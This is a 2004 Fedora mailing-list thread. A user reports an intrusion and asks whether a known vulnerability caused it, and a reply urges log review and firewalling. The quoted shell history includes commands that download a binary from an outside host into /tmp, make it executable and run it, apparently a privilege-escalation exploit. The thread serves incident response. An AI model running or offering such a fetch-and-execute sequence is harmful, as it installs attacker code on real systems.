Re: Vulnerability on FC3T2 ? Present in FC3 ?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



And how does this prove that there is a vulnerability in fedora and not that you have poor securty?

According to the URL's you post some one has installed a root kit.  Unlucky.  But they had to get it there first.

You should first discover how they got onto your machine.  You will need to check a lot more logs than just wtemp.  Try secure and messages as well.  Maybe some one guessed your password.  I really hope that you have firewalled that ip range out to help prevent further trouble from that IP range ( assuming though the hacker isn't bouncing from comprimised machine to comprimised machine ).  Also, you might want to consider who has had or might have had physical access to your machine ( if that is possible ).

Pointing the finger at Fedora with out real proof is pointless.


On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:
Someone logged into my system on 13 Nov 2004
I found the following in /var/log/wtmp

207-36-180-20.prt.primarydns.com
demo.allegientsystems.com

My user password was changed - but not the root password - and the 
following commands had been executed:-

w
uname -a
cat /etc/issue
cd /tmp
wget chebeleu.com/local
chmod +x local
./local -d -r
./local -d -r
lunx
lynx

There is a similar report dated 10-Nov-2004 at 
http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
where someone suggested it might be the exploit at 
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

Anybody know any more ?


[Index of Archives]     [Fedora Desktop]     [Fedora SELinux]     [Photo Sharing]     [Yosemite Forum]     [KDE Users]